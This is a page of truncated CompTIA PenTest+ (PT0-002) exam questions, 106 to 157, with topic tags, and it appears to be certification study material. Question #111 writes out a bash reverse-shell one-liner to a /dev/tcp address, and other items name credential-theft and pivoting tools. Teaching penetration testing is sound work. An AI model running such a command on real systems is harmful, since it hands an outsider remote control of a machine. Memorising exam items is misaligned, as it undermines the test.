PT0-002 Exam Questions
593 real PT0-002 exam questions with expert-verified answers and explanations. Page 3 of 12.
- Question #106Post-exploitation and lateral movement
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support...
PersistenceLinux Post-exploitationSystemdReverse Shell - Question #107Vulnerability discovery and analysis
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST li...
Password HashingMD5Rainbow TablesCryptographic Vulnerabilities - Question #109Attacks and Exploits
A penetration tester runs a scan against a server and obtains the following output: Which of the following command sequences should the penetration tester try NEXT?
FTPInitial AccessService InteractionPenetration Testing Methodology - Question #110Vulnerability discovery and analysis
In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BE...
SMTPOpen RelayPhishingVulnerability Discovery - Question #111Attacks and Exploits
A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0>&1 Which of the following additional commands would need to be executed on the...
Reverse ShellNetcatLinux CommandsCommand and Control - Question #112Attacks and Exploits
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login cred...
PhishingSpear PhishingSocial EngineeringCredential Theft - Question #113Attacks and Exploits
During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to imp...
ResponderCredential harvestingName resolution poisoningNetwork attacks - Question #114Post-exploitation and lateral movement
In a physical penetration testing scenario, the penetration tester obtains physical access to a laptop following as a potential NEXT step to extract credentials from the device?
Physical penetration testingCredential extractionLLMNR/NETBIOS-ns poisoningPost-exploitation techniques - Question #115Attacks and Exploits
A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profiles. For whi...
Social Media ReconnaissanceDictionary AttacksPassword Cracking - Question #116Attacks and Exploits
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?
Null sessionsRID cyclingUser enumerationVulnerability exploitation - Question #117Attacks and Exploits
Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter th...
Physical Security TestingBadge CloningPhysical Access ControlSocial Engineering - Question #118Planning and Scoping
A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets. Which of following BEST describes the types of adve...
Adversary typesAPT actorsThreat intelligenceTrade secret theft - Question #119Attacks and Exploits
Which of the following CPU register does the penetration tester need to overwrite in order to exploit a simple buffer overflow?
buffer overflowCPU registersmemory exploitation - Question #120Vulnerability discovery and analysis
After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the BEST control to reme...
Password securityPassword policiesVulnerability remediationSecurity controls - Question #121Reporting and Communication
A penetration test was performed by an on-staff junior technician. During the test, the technician discovered the web application could disclose an SQL table with user account and...
Penetration test reportingManagement communicationVulnerability disclosureExecutive summary - Question #122Engagement management
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant t...
Scope creepPenetration testing managementProject managementEngagement lifecycle - Question #123Attacks and Exploits
A penetration tester locates a few unquoted service paths during an engagement. Which of the following can the tester attempt to do with these?
Unquoted Service PathsPrivilege EscalationWindows ExploitationService Vulnerabilities - Question #124Reconnaissance and enumeration
A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company- provide text file that contain a list of IP addresses. Which of the following are needed...
NmapOS fingerprintingReconnaissanceCommand-line tools - Question #125Attacks and Exploits
Click the exhibit button. A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. W...
ARP spoofingNetwork attacksMan-in-the-MiddlePacket analysis - Question #126Attacks and Exploits
Click the exhibit button. Given the Nikto vulnerability scan output shown in the exhibit, which of the following exploitation techniques might be used to exploit the target system?...
NiktoVulnerability ScanningExploitation TechniquesWeb Security - Question #127Post-exploitation and lateral movement
Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?
MetasploitPivotingPost-exploitationSOCKS proxy - Question #128Attacks and Exploits
A tester has captured a NetNTLMv2 hash using Responder. Which of the following commands will allow the tester to crack the hash using a mask attack?
hashcatNetNTLMv2Mask attackHash cracking - Question #129Information Gathering and Vulnerability Scanning
A penetration tester has been asked to conduct a penetration test on a REST-based web service. Which of the following items is required?
REST API testingPenetration test prerequisitesInformation gatheringWeb services security - Question #130Reconnaissance and enumeration
A penetration tester is preparing to conduct API testing. Which of the following would be MOST helpful in preparing for this engagement?
API testingSwaggerOpenAPI SpecificationPenetration testing tools - Question #132Tools and Code Analysis
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
Linux commandsFile permissionschmodShell scripting - Question #133Planning and Scoping
A compliance-based penetration test is primarily concerned with:
Compliance testingSecurity standardsPenetration test objectives - Question #134Attacks and Exploits
A penetration tester is explaining the MITRE ATT&CK framework to a company's chief legal counsel. Which of the following would the tester MOST likely describe as a benefit of the f...
MITRE ATT&CKAdversary TacticsThreat IntelligenceSecurity Frameworks - Question #135Attacks and Exploits
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
Wireless attacksRogue access pointPenetration testing toolsAircrack-ng - Question #136Information Gathering and Vulnerability Scanning
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data. Which of the following should the test...
Vulnerability scanningCloud securityData exposureRisk prioritization - Question #137Attacks and Exploits
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the teste...
Social engineeringSecurity awarenessPenetration testing toolsSET - Question #138Vulnerability discovery and analysis
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
IoT securitycommon vulnerabilitiesdefault credentialsdevice security - Question #139Post-exploitation and lateral movement
Which of the following describes the reason why a penetration tester would run the command on a Windows server that the tester compromised? sdelete mimikatz. *
Post-exploitation cleanupMimikatzSecure file deletionOperational security - Question #140Attacks and Exploits
A penetration tester was brute forcing an internal web server and ran a command that produced the following output: blank page was displayed. Which of the following is the MOST lik...
Web server errorsBrute-force attacksHTTP responsesAttack result interpretation - Question #141Planning and Scoping
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those...
Scope ManagementPenetration Testing MethodologyTargeted ScanningVulnerability Identification - Question #142Reconnaissance and enumeration
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees' phone numbers on the company's website,...
ReconnaissanceOSINTWeb archivesSocial engineering - Question #143Vulnerability discovery and analysis
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is...
Vulnerability validationManual testingTrue positive identificationPenetration testing methodology - Question #144Attacks and Exploits
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired...
Wireless SecurityWPS (Wi-Fi Protected Setup)Brute-force AttacksVulnerability Assessment - Question #145Engagement management
A penetration tester ran the following commands on a Windows server: Which of the following should the tester do AFTER delivering the final report?
Post-engagement activitiesCleanupEthical hackingArtifact removal - Question #146Planning and Scoping
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the t...
Penetration test scopeBlack-box testingTesting methodologies - Question #147Reconnaissance and enumeration
The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggerin...
Port ScanningNetwork ReconnaissancePython Socket ProgrammingIDS Detection - Question #148Planning and Scoping
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
Rules of EngagementScopingEngagement PlanningPenetration Testing - Question #149Planning and Scoping
A new client hired a penetration-testing company for a month-long contract for various security assessments against the client's new service. The client is expecting to make the ne...
Risk EscalationClient CommunicationEngagement PlanningCritical Findings - Question #150Reconnaissance and enumeration
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entran...
ReconnaissanceOSINTPenetration Testing ToolsInformation Gathering - Question #151Information Gathering and Vulnerability Scanning
A penetration tester conducts an Nmap scan against a target and receives the following results: Which of the following should the tester use to redirect the scanning tools using TC...
ProxyChainsTraffic RedirectionSOCKS ProxyPenetration Testing Tools - Question #152Information Gathering and Vulnerability Scanning
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?
WiresharkPacket Analysis.pcapCredential Harvesting - Question #153Information Gathering and Vulnerability Scanning
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the...
NmapPort ScanningStealth ScanTiming Templates - Question #154Engagement management
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a...
Scope managementEthical hackingThird-party connectionsIncident handling - Question #155Attacks and Exploits
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relatio...
Social engineeringBaitingPhysical security attacksInitial access - Question #156Attacks and Exploits
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetr...
Penetration testing ethicsScope managementExploitation techniquesInsider threat assessment - Question #157Attacks and Exploits
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the se...
NTLM attacksReplay attacksAuthentication bypassPacket analysis